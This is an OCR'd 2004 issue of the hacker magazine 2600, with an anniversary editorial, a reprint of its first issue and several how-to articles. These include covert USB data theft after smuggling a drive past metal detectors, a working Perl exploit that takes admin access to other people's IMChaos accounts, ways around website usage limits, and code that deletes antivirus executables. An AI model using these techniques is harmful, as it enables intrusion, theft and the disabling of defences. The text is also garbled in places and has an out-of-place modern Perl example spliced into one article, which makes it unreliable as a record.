The Army needs more BlUimiS

"We have never had vulnerabilities exploited before the patch was known." - David Aucsmith, head of technology at Microsoft's security business and technology unit, February 2004.

Editor-In-Chief: Emmanuel Goldstein
Layout and Design: ShapeShifter
Cover Design: Dabu Ch'wald
Office Manager: Tampruf
Writers: Bernie S., Billsf, Bland Inquisitor, Eric Corley, Dalai, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, The Prophet, David Ruderman, Screamer Chaotix, Seraf, Silent Switchman, StankDawg, Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: css, mlc
Broadcast Coordinators: Juintz, Pete, daRonin, Digital Mercenary, Kobold, w3rd, Gehenna, Brilldon, Chibi-Kim, lee, Nico, Logix, Boink, John
IRC Admins: daRonin, Digital Mercenary, Shardy, The Electronic Delinquent
Inspirational Music: Boards of Canada, Tim Ruts, Elvis Costello, Deodato, DJ Danger Mouse, Coil, Jean Michel Jarre, (talihy McCIntchy, Tenacious D
Shout Outs: Edgar Allan Poe

2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc., 2 Flowerfield, St. James, NY 11780. Periodicals postage paid at St. James, NY and additional offices.

POSTMASTER: Send address changes to 2600, P.O. Box 752, Middle Island, NY 11953-0752.

Copyright (c) 2004 2600 Enterprises, Inc.

YEARLY SUBSCRIPTION: U.S. and Canada - $20 individual, $50 corporate (U.S. funds). Overseas - $30 individual, $65 corporate. Back issues available for 1984-2003 at $20 per year, $26 per year overseas. Individual issues available from 1988 on at $5.00 each, $6.50 each overseas.

ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO: 2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 (subs@2600.com).

FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO: 2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 (letters@2600.com, articles@2600.com).

2600 Office Line: 631-751-2600
2600 FAX Line: 631-474-2677

fUlND DROPPING*

Twenty Years After
Taking Advantage of Physical Access
Bypassing Minor Website Security
Exploiting AIM Screen Name Loggers
Using Perl to Defeat Provider Restrictions
A Simple But Effective Spanner in Your AVS
Hacking the Hilton
Cruise Cracking
A Sprint PCS Trick
Hacking a Mercedes Benz with a Universal Remote
The $ l 40 Hardware War Dialer
Serial Number Security
Barcode Tricks
Installing Debian on your Unmodded Xbox
Letters
Uncapper's Paradise
Inside Adelphia
Subverting Non-Secure Login Forms
Setting Your Music Free: iTunes Music Sans DRM
Vonage Broadband Security Risk
Sharing Your Life on a Peer-to-Peer Network
MSN Redirect Scan
Marketplace
Meetings

This issue marks the beginning of our 20th anniversary. Never in our wildest dreams did any of us think it would come this far. Back in 1984, our first issue was xeroxed after hours in an office we weren't even supposed to be in and sent out to about two dozen people who had heard about us on several BBS's. We fully expected to be arrested shortly afterwards, since there was already an active hacking prosecution focusing on members of our staff and since we chose to put an expose in our first issue that exposed an FBI informant.

As it turned out, the knock on the door never came, the prosecution ended with a relatively fair sentencing (no damage caused, no imprisonment, no crippling fines), and the case that the exposed FBI informant was helping to build collapsed under the weight of the scandal. Even members of the FBI saw humor in the situation.

A lot has happened in 20 years. We often choose to focus on the negative developments, mostly because they pose an imminent risk to many of our readers and also because there seem to be so many of them. But there have been plenty of good things over the years and we have no doubt there will be many more. It's important not to overlook them.
The fact that we're still here and still strong is really a cause for celebration.

From the beginning, we've gotten support from some of the most unlikely places. That was our first big surprise. People within many of the federal agencies we had seen as foes cheered us on with letters of encouragement or warm words at a conference. A good number of individuals inside the corporations we wrote about looked forward to their next issue of 2600 as eagerly as any hacker. They even helped out by writing articles. And the enthusiastic reaction spread everywhere else you could imagine - foreign countries, the military, even a few parents. And none of this seemed to be in any way limited to one end of the political spectrum. From the far left to the far right and just about everywhere in between, people seemed to get it, to appreciate what it was that 2600 stood for.

And that, more than anything else, is what has kept us going. It's one thing to stand up for what you believe in and to constantly be speaking out on the issues. But without the support shown from all of you in so many different ways, we would have quickly run out of steam. We can only hope that others who become involved in things they feel passionately about get to experience this remarkable feeling too.

It was ten years ago that our main concern was the explosive interest in the hacker world by the mainstream and how this could pose a threat to our ideals. In 1994, on our tenth anniversary, there was a surge in books and movies about hackers and this in turn led to a huge influx of people who wanted to call themselves hackers without actually learning anything. The dynamics had changed and hackers were in danger of being subverted by this sudden mass appeal. Today the masses still regard hackers with a mixture of fear and admiration but, more importantly, the hacker ethic is still alive and well. If it can survive what's going on today, we think it'll be around for quite some time to come.
It was also in 1994 that we had our very first HOPE conference which originally was organized to mark our tenth anniversary. Ten years later, we're having our fifth conference - The Fifth HOPE. The conferences too have witnessed massive growth and change over the years and we constantly hear how the experiences have made a difference in people's lives and given them all kinds of inspiration and new things to think about. We hope to continue that tradition this July and we're looking forward to seeing many of you there as we officially celebrate 20 years. And if you want to get involved as a speaker or a volunteer, we welcome your participation as always. Just visit www.hope.net for all the details.

While being around for everything that's happened in the last two decades was something truly unique, we need to remember that there is a constant influx of new people who didn't get to witness most of it firsthand. That's why our history is vital and why we're so lucky to have much of it documented, whether it be through our back issues, our archived radio shows, or video from the conferences. Things are always changing but that change can be imperceptible on a day to day basis. It's important to go back and review and realize how our lives, our technology, and society have become different. And for those who are new, knowing how things looked, sounded, or felt in the past is a key to understanding and affecting the future.

We all know about the bad things - the use of technology as a restrictive tool, the increasing paranoia and repression that's all around, the demonization of hackers, the insane and out of proportion punishments.... The way things are going it's likely to get a lot worse before it gets any better. That's why our collective voices are so important. Imagine what the last 20 years might have been like had we never gotten beyond that first issue.
We didn't know what would happen next back then and we know that even less today. But what we do know is that we have to face it without flinching. This is how history is made.

January, 1984
VOLUME ONE, NUMBER ONE

AHOY!

(That's how Alexander Graham Bell used to answer his phone. For some reason, it never caught on.)

This is the very first issue of 2600. We will, on this page, explain our motives and what the goals are which we hope to achieve with this publication.

The idea for 2600 was born early in 1983. We saw a tremendous need for some form of communication between those who truly appreciate the concept of communication: technological enthusiasts. Of course, others have different ways of describing such people - these range from words like hacker or phreaker to stronger terms such as criminal or anarchist. Our purpose is not to pass judgement. 2600 exists to provide information and ideas to individuals who live for both. All of the items contained on these pages are provided for informational purposes only. 2600 assumes no responsibility for any uses which this information may be put to.

Of course, a lot has changed since our first days. War Games came out. And then the 414 gang got caught. Suddenly everyone was talking about phreakers and hackers. And while there were some that sort of jumped into the limelight, others were a bit more cautious; in fact, some were quite upset. Sure, the publicity was fun. But what would be the cost?

Well, time has passed and the cost has been high. Phreakers and hackers have been forced into virtual isolation. Raids by the FBI have become almost commonplace. The one magazine that was geared towards phone phreaks (TAP) mysteriously disappeared at the height of the crisis, sparking rumours that they, too, had been raided. However, in November, the magazine resurfaced, with an explanation that a fire had destroyed part of their mailing list. (Incidentally, if your name was one of the ones that was lost, you can claim the issues you are entitled to by sending TAP a copy of their mailing label or a cancelled check.)

And then there was the legendary computer bulletin board known as OSUNY. Enthusiasts from all across the country called up this board and left messages ranging from the latest in Sprint codes to how to crash an RSTS system to what to do once you've finally gained access to Autovon. Within a week after being mentioned in Newsweek, OSUNY was disconnected. Word has it that they are still in existence somewhere, but by invitation only. A truly smart move, if that is the case.

Many hackers were keeping a low profile even before the October raids. When the FBI confiscated equipment from 15 sites across the country on the twelfth and thirteenth of the month (sponsored by a grant from the folks at GTE), many of our contacts were lost because they feared the consequences of continuing. Two organizations, the Inner Circle and PHALSE, were deeply affected by the raids. The latter group (whose initials signify Phreakers, Hackers, and Laundromat Service Employees) is still in contact with us on occasion and has promised to contribute many articles devoted to just what was really going on.

So it seems that the events of 1983 have conspired to actually strengthen the resolve of hackers and phreakers across the country to put out this monthly newsletter. We hope you will help us continue by subscribing, spreading the word among your friends, and of course contributing articles and information. Since we are non-profit, it really doesn't matter to us if you xerox your copy and send it to someone else - all we ask is that you let us know so that we can have a rough idea of how many people we're reaching.
2600 has several sections, some of which will appear every month, others on an irregular basis. On this, the front page, and on page two, you will always find informative full-length features on relevant subjects. Future topics include "A Guide to Long Distance Telephone Services and Their Vulnerabilities", "DEC and Their Many Mistakes", "Phreaking in the Sixties", and "Tracing Methods Used by the Law", as well as any late-breaking items. "FLASH" appears on page 3 and provides a roundup of timely news items written from a technological enthusiast's perspective. Page 4 is used for a variety of things - interesting stories from the past, schemes and plots that just might work, and feedback from subscribers. The last two pages of 2600 are comprised of data. Just what sort of data, we cannot say. However, if it is something that you are looking for, then you will probably recognize it.

The three holes on each page serve a purpose. We suggest that you obtain a loose-leaf book so that you can neatly file every issue of 2600 you receive.

Many thanks to those of you who subscribed without even seeing an issue. A word of advice, though: don't do it again or you'll probably get ripped off! We'd also like to thank those who took advantage of our free issue offer. If interested in subscribing, the rates and address can be found at the top of this page.

Welcome to 2600. Turn the page and become a part of our unique world.

Taking Advantage of Physical Access

by Wrangler

If you want to attack someone, you don't do it on CNN. Rather, you plan covertly, go in quietly, accomplish your objective, and get out leaving no traces. This methodology is standard operating procedure for hackers, military Special Forces, and anyone else with a clue. What follows is a brief lesson on how to hack a computer in a secure organization under certain circumstances.

The following givens apply to this discussion. First, physical access to the target machine is required.
Second, the machine must not require authentication, i.e. it must already be "logged in." Third, the available account must afford sufficient privileges to permit the user to physically attach hardware to the machine. On most computers running a variant of UNIX this will require operator or root account access. On computers running Microsoft Windows XP or 2000 every account can perform this task unless explicitly prohibited in the user policy.

Begin by purchasing a 256 megabyte solid-state hard drive. I bought one recently on eBay for around US $50 plus shipping and handling. The typical unit measures .25 by .75 by 2.75 inches. The unit connects to the computer using any available Universal Serial Bus (USB) port. Any computer that has enabled USB ports recognizes the hardware. Driver installation is automatic for Windows XP and 2000 machines, courtesy of Microsoft's "plug and play" mechanism. The drive will appear as a removable disk. For machines running UNIX with USB compiled into the kernel, no driver is required. However, formatting, mounting, and unmounting the drive requires full administrator (root) privileges. The drive can be preformatted with various file systems for Windows or UNIX machines depending upon what machine you intend to target. Format the drive with one or more file systems prior to reaching the target location.

These new solid state USB drives are virtually undetectable by the hulking giant metal detectors used to scan people who enter and leave corporate and government buildings. Dismantle or modify the sole or heel of a running shoe or dress shoe that will accommodate the hardware. To infiltrate the device into the target location, upon arrival at the target casually toss your suspicious cellular phone and deadly car keys into the plastic tray provided and walk through the metal detector without so much as a second look.
If the target location requires you to remove your shoes, as some federal buildings do, conceal the device in a metal coffee mug by wrapping it in a plastic bag, effectively "floating" the device inside the metal container, which will appear to be empty. In the unlikely event that security personnel open the container, act surprised, apologize, and retreat to return the offensive device back to your car.

Once you have infiltrated the device within the confines of the building, it is a simple matter of waiting for an opportunity. An unattended workstation that is not properly secured and a couple of uninterrupted minutes and the data, confidential or otherwise, are yours for the taking.

Surprisingly, the one shortcoming of using these devices is not the gizmo itself. Rather, the target computer's hard drive will be your biggest obstacle. The flash memory chip inside the solid-state hard drive can read in the data as fast as the computer can hand it over. Hard drives, however, operate much more slowly, make noise, and usually illuminate a light when they are in operation. Additionally, the presence of the USB port on the front of the machine, such as with some Compaq workstations, will make the data transfer somewhat conspicuous since some solid-state flash disks light up when connected.

To implement the data transfer, a variety of options are available. You may choose a commercial product, such as Symantec Ghost, and attempt to copy the entire drive (provided that the solid state disk can accommodate the target hard drive's capacity). Alternately you can utilize other software, perhaps custom built to not show up in the Task Manager Window, and grab data at your leisure. The data capture can be scripted if you are familiar enough with the target machine to identify the data of interest beforehand.
If you will have uninterrupted access to the machine over a long period of time, this is the best method since the software can be written to perform the data transfer in a less obvious manner. Another option available if the machine will be accessible over a long period of time is to utilize a keystroke monitor and capture any username and password combinations that the target may enter.

Recently I attempted this tactic on an unsuspecting acquaintance. While distracting the target, I inserted the solid-state hard disk into the USB port on the back of their PC. The Windows operating system automatically recognized and installed the drive. Next, Windows automatically loaded a pre-written script, named autorun, from the flash disk. The script proceeded to copy the workstation's "My Documents" folder and all existing subfolders while the target and I were away from the office. Back in the office, when the opportunity presented itself, I removed the hard drive from the USB port. The target computer displayed a dialog box indicating that removing a drive without detaching it first is not recommended. I quickly checked the "do not display" box and clicked the OK button. With the flash disk in my pocket, I walked away undetected.

What can be done to defend against such an attack? Since most organizations will not abandon Windows, they need to ensure that their existing network security policy prohibits users from attaching any hardware to their machines. Site security needs to be educated and informed about the technology so that they can be more vigilant. Last but not least, employees must be trained to not leave their workstations unattended for any period of time, especially when non-employees are present in the organization.

Bypassing Minor Website Security

by Galahad
galahad@galahadhq.com

This article describes several tricks some websites use to protect their content, limit the number of times you use their services, and even spy/collect information on you.
It also describes methods to bypass this sort of mild security.

Keep in mind that this article is for educational use only. The sites that apply these methods of security may do so in an effort to protect their copyrighted content. It is every artist's right to give out his work for a price, and you must respect that. I do not endorse stealing (though in this case the crime is cheating at worst). This is only for you to learn of these tricks, how to bypass them, and how to use them for your own website, so that we can crack them, hehe.

In this article I'll be using Windows 98 SE and Internet Explorer 6. If you use another operating system or browser, find the settings equivalent to those described on your browser or OS. I'd like to mention that this article is written for beginners, and I am quite sure that most of the methods described are already known to and maybe used by the more advanced. But then again, I might surprise you. Let me also mention that any websites mentioned here are merely used as examples. I do not mean to harass these sites. I only included them because they bear good examples of the "tricks" I describe.

Right-Click Suppression

Problem: Ah yes, good old right-click suppression. This is the method to "protect" the site's viewable content from being saved to disk through disabling the right click of the mouse. This is also the most annoying and the easiest to bypass. The sites that use this are usually quite amateurish (have you ever noticed that no professional website has right-click suppression?) and it can be very annoying for the user of the website.

Solution: What we want to do here is save the text, the images, and the video that is on the website onto disk. How do you do that? Simple. Just view the website. Now it's on your hard disk. "How?" you may ask.
Well, what the webmasters that use right-click suppression don't realize is that when you view text or image or video on their site, it's downloaded into your "Temporary Internet Files" folder automatically. So the files they try so desperately to protect are already on your computer. So the only problem is how to get to the files on your computer. I'll explain how, and I'll also describe a few alternative methods to do this.

Method A: View the website. Once the whole page has been downloaded, go View>Source. This should open up your notepad/wordpad. Now, what we need to find is the name of the file we want. Look for text nearest to the picture in question. For instance: "This is a picture of a full moon" is shown on the page right next to the picture on the page. So in the source code of the document (View>Source) search for "This is a picture of a full moon". Now, if the picture came in after the text, then look for the picture name after this text. An example of what the picture will look like is: , where "abcd.gif" is the name of the picture you're after. Now open your Windows Explorer, go to the "Windows" folder, then to the "Temporary Internet Files" folder. Search for "abcd". Note that I didn't include the file extension ".gif". There is a reason for that. When the search finishes, you should see something like "abcd[1].gif". That's the file. If there are multiple results, they will look like "abcd[1].gif" and "abcd[2].gif". This means that there was another image named "abcd.gif" on another site. Open them both to see which one is the one you're after. Once you find it, copy it to a folder you want, and there you go.

The next method is a simpler way to do the above:

Method B: Open the web page you want. Go File>Save As and save it somewhere on your computer. We'll name the file "Gamestation". Now, go to that file on your computer. In the same folder that contains "Gamestation.htm" there should be a folder named "Gamestation_files".
Open that folder. It contains all the pictures contained on that site!

The next method is a more complex version of the above, that involves removing the JavaScript code that causes this right-click suppression from the file saved locally. You'll need an HTML Editor program, though you can simply open the ".htm" file from notepad.

Method C: Open the saved "Gamestation.htm" through your HTML editor or notepad/wordpad. Near the beginning of the source code, somewhere in between the and the tags, there should be some code in between a Found it? Delete that piece of code. Now save the file, and open it from your web browser. You should find that there is no more right-click suppression.

Cookie Protection

Problem: Some sites offer services for free, but only for a few times a day. For instance, gamewallpapers.com contains downloadable wallpapers of various games. You can download two or three and then you get a message: "Daily Wallpaper Limit Reached." To view more wallpapers, you have to pay an amount of money or wait for the next day to see a few more.

Solution: In this case, the site places a cookie on your system. Whenever you visit the site, it will view that cookie, and see how many, if any, wallpapers you have seen that day. What we have to do is block the site from opening the cookie. There are two ways to do this. The first will allow you to view as many wallpapers as you like. The second is in case the first doesn't work, and you'll have to repeat the process every time you view three wallpapers.

Method A: Open Internet Explorer. Go Tools>Internet Options. On the window that will pop up, click on the "Security" tab. Near the bottom of the window, there should be a "Custom Level" button. Click on it. In the new window that will pop up, scroll down until you see "Cookies". Under "Cookies" there are two sub-titles: "Allow cookies that are stored on your computer" and "Allow per-session cookies (not stored)".
Each of these two has three selections: "Disable", "Enable", and "Prompt". Select "Disable" for both of them. Click "OK" and "Yes" on the message that will pop up. Note that from this screen you can click "Default Level" to restore your settings as they were before if you have any problems. Now click "Apply" and click "OK". Close your browser, reopen it, and go to the page with the limitations, in our case "gamewallpapers.com". Presto! Unlimited access to the content!

What? It didn't work? When you go to the page it says: "Your web browser uses an HTTP proxy that filters out 'cookies'" or something similar? Oh well. Guess we'll have to try the other method:

Method B: Open your Windows Explorer. Go to the OS directory (Windows in my case), then to the "Cookies" directory (or wherever your computer stores your cookies). Now, look for (manually or by searching) a cookie that contains the address of the site in question. In my case it's "gamewallpapers.com". (Note: There may be more than one. If so, select them all.) Found it? Now delete the little bugger! Next, open Internet Explorer. Go Tools>Internet Options. From here look for "Temporary Internet Files". In this area click the "Delete Files..." button. Make sure there's a check mark in the box next to "Delete all offline content", and click OK. When it's done deleting, click "Apply" and click "OK". Then open the website and get the files. The thing is, once you hit the limit again, you'll have to repeat the entire process. Better hope the files are worth the trouble....

Web Bugs

Problem: A web bug is a small graphic on a web page or in an e-mail message designed to monitor who is reading the page or message. Web bugs are usually GIF images, 1-by-1 pixels in size, so are most probably virtually invisible. They are usually placed on Web pages by third parties interested in collecting data about visitors to those pages.

Solution: You can't exactly remove a web bug from a website.
And even if you downloaded the whole site and removed the web bugs from the source code of the local file, you would still need to actually find the web bug, and that's not easy. In the source code of the page in question, you should look for tags in the code that start with "IMG SRC", for instance <IMG SRC="images/bug.gif">. The size of the image should be 1-by-1 pixel (WIDTH="1" HEIGHT="1"), and the location of the image will usually be on another website ().

A much easier way to find web bugs is using an Internet Explorer add-on called "Bugnosis", which can be downloaded from www.bugnosis.org, where you can also find more detailed documentation on web bugs. The Bugnosis add-on locates the web bugs in a web page you're viewing and replaces it with an image you select. This way you can make the web bugs appear, though this won't halt their activity. To block web bugs you must use an advertisement blocker (a few good ones are recommended at the Bugnosis site).

Are You an "Off The Hook" Listener?

If you've grown weary of downloading all of the archived shows from 1988 onwards, then you should continue reading this paragraph! We've taken all of the shows from 1988 to 2003 and stuck them onto a single DVD. That's right, they're all on one disc! These are the MP3's that you can still download from our site. For only $30 you can save yourself the time and storage needed to have all of these shows (and show summaries) at your fingertips. (These DVD's are readable in all but the oldest of DVD computer drives and they will also work on most standalone DVD players!) To order, visit our online store at http://store.2600.com or send $30 to: 2600, P.O. Box 752, Middle Island, NY 11953 USA

Exploiting AIM Screen Name Loggers

by Stik

As an AOL Instant Messenger user, you are probably familiar with IMChaos.com, the site known for its unique screen name loggers. To make and use your own, you choose what type of logger you want from their site; Simple List, Profile Pic, Spy Survey... all offered options will work. You fill out the required forms then copy and paste your personally generated hyperlink to your profile. Your friends will see the link in your profile, click it, and it will add their screen name to the list of others who clicked the link.

On older IMChaos loggers, you were able to gain admin access by copying the hyperlink url from the AIM Profile window and pasting it into your browser address bar and changing your screen name to the profile holder's screen name. With admin access you can delete, edit, and view detailed info about the visitors. Once this technique stopped working, I started to think about what the problem could be and what they could have changed to prevent this from functioning. I knew it worked in the AIM Profile window, but not Internet Explorer or any other browser I tried. I used a small script to grab the environment variables out of the current browser, so I could compare the results from Internet Explorer with those from the AIM Profile.

    #!/usr/bin/perl
    ##
    ## printenv -- demo CGI program which just prints its environment
    ##
    print "Content-type: text/plain\n\n";
    foreach $var (sort(keys(%ENV))) {
        $val = $ENV{$var};
        $val =~ s|\n|\\n|g;
        $val =~ s|"|\\"|g;
        print "${var}=\"${val}\"\n";
    }

I then noticed the difference in UserAgent strings and came to the conclusion that the php script they use on their site must have a line of code that looks something like this:

I decided to test my theory by writing a script to spoof the AIM Profile window using Perl, emulating the AIM Profile browser by using its UserAgent in my attempt to reach the admin page. Just as I thought, the site only works properly for the AIM Profile browser, and now, any browser using my script.

My code is listed below. I commented it heavily for this article so you can understand what is going on.
If you decide to try to run this code, make sure it is on a machine supporting perl/cgi with the modules HTTP::Request and LWP::UserAgent installed (which are easily obtained for free at cpan.org if you do not have them). Once you become comfortable with the code feel free to add on to it and make it better.

    ## IMChaos.cgi
    ## Exploit to gain admin access to any IMChaos account
    ## Spoofs the AIM Browser Window
    ##
    ## Written by: Stik

    use HTTP::Request;
    use LWP::UserAgent;
    ## Includes the above modules to be used in the script

    print "Content-type: text/html\n\n";
    ## To output as an HTML Page, this is necessary

    $agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)';
    ## UserAgent String of the AIM Window

    $tmp = $ENV{'QUERY_STRING'};
    ## URL of the hyperlink clicked, blank if no hyperlink was clicked

    if ($tmp ne "") {
        ## The following keeps the browser spoofed when hyperlinks are clicked
        $tmp =~ s/link=//g;
        ## Removes the word "link=" from the URL of the clicked hyperlink
        $listurl1 = $tmp;
        ## URL of the clicked hyperlink
        $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
        ## Spoof the AIM Profile UserAgent as the UA of the current browser
        $request = HTTP::Request->new(GET => "$listurl1");
        $content = $ua->request($request)->content;
        ## Request the HTML of $listurl1, the clicked hyperlinked page
        print "$content\n";
        ## Display the page as it would be seen in the AIM window
    } else {
        ## The Normal Spoofed page, before any hyperlinks are clicked
        $listurl = 'http://dilutedweb.com/m.php?a=AdminScreenName&b=SETOFLETTERS';
        ## $listurl MUST be the hyperlink url with the profile holder's SN in place of yours
        $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
        ## Spoof the AIM Profile UserAgent as the UA of the current browser
        $request = HTTP::Request->new(GET => "$listurl");
        $content = $ua->request($request)->content;
        ## Request the HTML of $listurl, the Admin IMChaos Page
        $content =~ s/href=\"/href=\"IMChaos.cgi?link=/g;
        ## Replace all links with code to keep the browser spoofed as AIM
        print "$content\n";
        ## Display the page as it would be seen in the AIM window
    }

Using Perl to Defeat Provider Restrictions
by TRM

In this article I will describe how two Perl scripts can work together to update your hosted website with links to your personal home web server. This is handy if you have a broadband ISP that changes your IP address on a regular basis, or if you just need to be able to handle the rare occasion where that might happen.

Background

A few years ago the company I work for was selling some of their old PCs to the employees. I purchased one of these systems because I wanted the 17" monitor. The computer was a no-name 200MHz with 32M of RAM. Not knowing what else to do with this box I installed Linux. It soon became a headless Apache/MySQL server. Having experience with Perl and databases I began writing a small application that would allow me to save and catalog work-related information (like Oracle optimization tricks, which I have trouble remembering on my own).

I have broadband service and a home network. A diskless Coyote Linux router provides NATing, DHCP, and firewalling. I opened a hole in the firewall and port forwarded to my new Linux box. Now I could access my web server from work and home!

The Problem

Occasionally my ISP updates my IP address. Or the power goes out for a day and my old IP gets reallocated. Whatever the reason, every now and then my IP address changes. The more I came to depend on my little web application (which was growing all the time), the more inconvenient these IP changes became. I was the only one who was going to access the server so I didn't see the point of subscribing to a DNS service. I tried to find a way to email myself at work whenever the IP changed, but every attempt I made to determine my external (ISP provided) IP address from the Linux server using a script ended in failure because of the NATing.
I could have loaded a script onto the boot floppy of the Coyote router, but there isn't much room on that floppy for extra scripts, so running a program from there didn't seem like a good option.

The Solution

Then I remembered that when a web server receives a request the IP address of the requester is available to CGI scripts. So I wrote two Perl scripts. The first script is run from a cron job on my Linux server at home. It makes a web site request. The second script runs on my free website account. It handles the request from the first script and creates files which are later included in one of the pages on the site using Server Side Includes.

Here is the first script:

    #!/usr/bin/perl
    #########################
    ## getIP.pl - requests a page from a website and just exits.
    #########################
    use strict 'refs';
    use LWP::Simple;
    my ($content);
    my $linkURL = "http:///cgi-bin/getIP.pl";
    $content = get($linkURL);

This script doesn't do much, but it does introduce the LWP Perl module. LWP provides an easy way to implement web clients in Perl. In this case all we want to do is send a request to our Perl script on the external site. We don't care about getting a page back so the script terminates right after the request.

I created a cron job that executes this script once every hour. So if the IP address of my home web server changes, the links on my external site will have the new IP within the hour. This is really handy if the IP changes while I'm trying to use my application from work. Of course, I could run this script every five minutes if I wanted to.

The second script does most of the work (not that there's much to do). It uses the web server's REMOTE_ADDR environment variable to create small files on the web server. Using SSI these files are later included into a page on my external site.
    #!/usr/bin/perl
    #########################
    ## getIP.pl - Save the IP address of the requester
    #########################
    use strict 'refs';
    $remoteAddress = $ENV{REMOTE_ADDR};
    #
    # This saves a file on the server that contains just the IP address,
    # just for shits and giggles.
    #
    open(OUTFILE, ">homeIP.txt");
    print OUTFILE $remoteAddress;
    close OUTFILE;
    #
    # This file contains an HTML anchor that points to the application
    # on my home server.
    #
    open(OUTFILE, ">appname.html");
    print OUTFILE "My Application";
    close OUTFILE;
    #
    # This file has an HTML anchor that points to the same application
    # on my home server. But this time over SSL (port 443)
    #
    open(OUTFILE, ">secure_app.html");
    print OUTFILE "My App (secure)";
    close OUTFILE;
    #
    # This file has an HTML anchor that points to a second application that I use.
    #
    open(OUTFILE, ">secondApp.html");
    print OUTFILE "Second App";
    close OUTFILE;
    #
    # A static web page on the home server
    #
    open(OUTFILE, ">page.html");
    print OUTFILE "Static Page";
    close OUTFILE;

Now that I have four new files on the hosted web site, what do I do with them? I created a .shtml file that takes those files and places them inside a web page. Now the page can be viewed and the links are always up to date.

    <title>Links to home server</title>
    <font size="6"><strong>My Stuff at Home</strong></font>
    <!--#include file="cgi-bin/appname.html" -->
    <!--#include file="cgi-bin/secure_app.html" -->
    <!--#include file="cgi-bin/secondApp.html" -->
    <!--#include file="cgi-bin/page.html" -->
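The hosted getIP.pl above rewrites the link files with the address of whoever requests it, so the following added example (not TRM's code) goes one step further and shows the hosted side accepting an update only when the request carries a fresh HMAC made with a secret shared with the home cron job. The secret, the five-minute window, the "/" link path and all function names are assumptions made for this illustration; in a real CGI the last accepted timestamp would be kept in a file between requests.

```perl
#!/usr/bin/perl
# Added example, not TRM's script: an authenticated variant of the hosted getIP.pl.
use strict;
use warnings;
use Digest::SHA qw(hmac_sha256_hex);
use File::Temp qw(tempdir);

# Assumptions: a secret known only to the home cron job and the hosted CGI,
# and a five-minute tolerance for clock difference between the two machines.
my $SECRET  = 'replace-with-a-long-random-value';
my $MAX_AGE = 300;

# Home side: the query string the cron job appends to the getIP.pl URL.
sub sign_request {
    my ($now) = @_;
    return "t=$now&sig=" . hmac_sha256_hex($now, $SECRET);
}

# Compare two strings without stopping at the first differing byte.
sub same_string {
    my ($x, $y) = @_;
    return 0 unless length($x) == length($y);
    my $diff = 0;
    $diff |= ord(substr($x, $_, 1)) ^ ord(substr($y, $_, 1)) for 0 .. length($x) - 1;
    return $diff == 0 ? 1 : 0;
}

# Hosted side: returns (1, $ip) when the links may be rewritten, otherwise
# (0, $reason). $last_t is the timestamp of the last accepted update.
sub check_request {
    my ($query, $remote_addr, $now, $last_t) = @_;
    my %p;
    for my $pair (split /&/, defined $query ? $query : '') {
        my ($k, $v) = split /=/, $pair, 2;
        $p{$k} = $v if defined $k && defined $v;
    }
    return (0, 'missing fields') unless defined $p{t} && defined $p{sig};
    return (0, 'bad timestamp')  unless $p{t} =~ /\A\d{1,12}\z/;
    return (0, 'bad signature')
        unless same_string(lc $p{sig}, hmac_sha256_hex($p{t}, $SECRET));
    return (0, 'stale request')    if abs($now - $p{t}) > $MAX_AGE;
    return (0, 'replayed request') if $p{t} <= $last_t;
    # REMOTE_ADDR comes from the web server, but check its shape before it
    # is written into a file that is later included in an HTML page.
    my @o = (defined $remote_addr ? $remote_addr : '')
        =~ /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\z/;
    return (0, 'bad address') unless @o == 4 && !grep { $_ > 255 } @o;
    return (1, join('.', map { $_ + 0 } @o));
}

# Write the include file atomically so the .shtml page never reads a partial file.
sub write_link {
    my ($path, $ip, $label) = @_;
    my $tmp = "$path.tmp.$$";
    open(my $fh, '>', $tmp) or die "open $tmp: $!";
    print {$fh} qq{<a href="http://$ip/">$label</a>\n};   # "/" is an assumed path
    close($fh) or die "close $tmp: $!";
    rename($tmp, $path) or die "rename $tmp: $!";
    return $path;
}

# Constructed requests: one from the home server, three from other sources.
unless (caller) {
    my $now  = 1_080_000_000;            # constructed clock value
    my $good = sign_request($now);
    my $dir  = tempdir(CLEANUP => 1);    # stands in for the cgi-bin directory
    my $last = 0;
    my @cases = (
        [ 'signed by home box',    $good,                    '203.0.113.7',  $now + 10 ],
        [ 'unsigned visitor',      '',                       '198.51.100.9', $now + 20 ],
        [ 'forged signature',      "t=$now&sig=" . '0' x 64, '198.51.100.9', $now + 30 ],
        [ 'captured and replayed', $good,                    '198.51.100.9', $now + 40 ],
    );
    for my $c (@cases) {
        my ($label, $query, $addr, $clock) = @$c;
        my ($ok, $detail) = check_request($query, $addr, $clock, $last);
        if ($ok) {
            ($last) = $query =~ /\bt=(\d+)/;
            write_link("$dir/appname.html", $detail, 'My Application');
        }
        printf "%-22s %s (%s)\n", $label, $ok ? 'update' : 'reject', $detail;
    }
}
```

Run from the command line, only the first constructed request rewrites appname.html; the other three are rejected with the reason shown.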
This may not be the most elegant solution to the problem. In fact, it's a bit of a kludge. But it doesn't rely on an external DNS provider and was easy to implement.

Related Links

http://free.prohosting.com - reliable free web hosting with CGI support.
http://lwp.linpro.no/lwp/ - for information about the LWP and libwww-perl perl modules.

Thanks to: Joshua Jackson for creating Coyote Linux, Larry Wall for Perl - the most fun programming language on the planet, Jen, Will, and Maddy for putting up with my computer habit.

A Simple But Effective Spanner in Your AVS
by Irving Washington
thedarkshirt@hotmail.com

First off, sorry if anyone's miffed that I wrote this in Object Pascal. I happen to like Borland's IDEs, and Delphi 7 came free with a computer mag DVD. I actually like it when the aim is to produce a Win32 app which can easily take the look and feel of all the Win OS's, from the battleship gray of 95 to the Fisher-Price makeover of XP. So there. I'm sure you all will take about ten seconds to appreciate the concept and can then write something similar in your own languages.

The basic concept is this: On execution, the program looks for various .exe files in their standard installation places on the PC running the program. If they exist, the program deletes them. For example:

    if fileExists ('C:\AVS\AVS.exe') then deleteFile ('C:\AVS\AVS.exe') endif.
    (Repeat for each file you want to delete)

And that, as they say, is that.

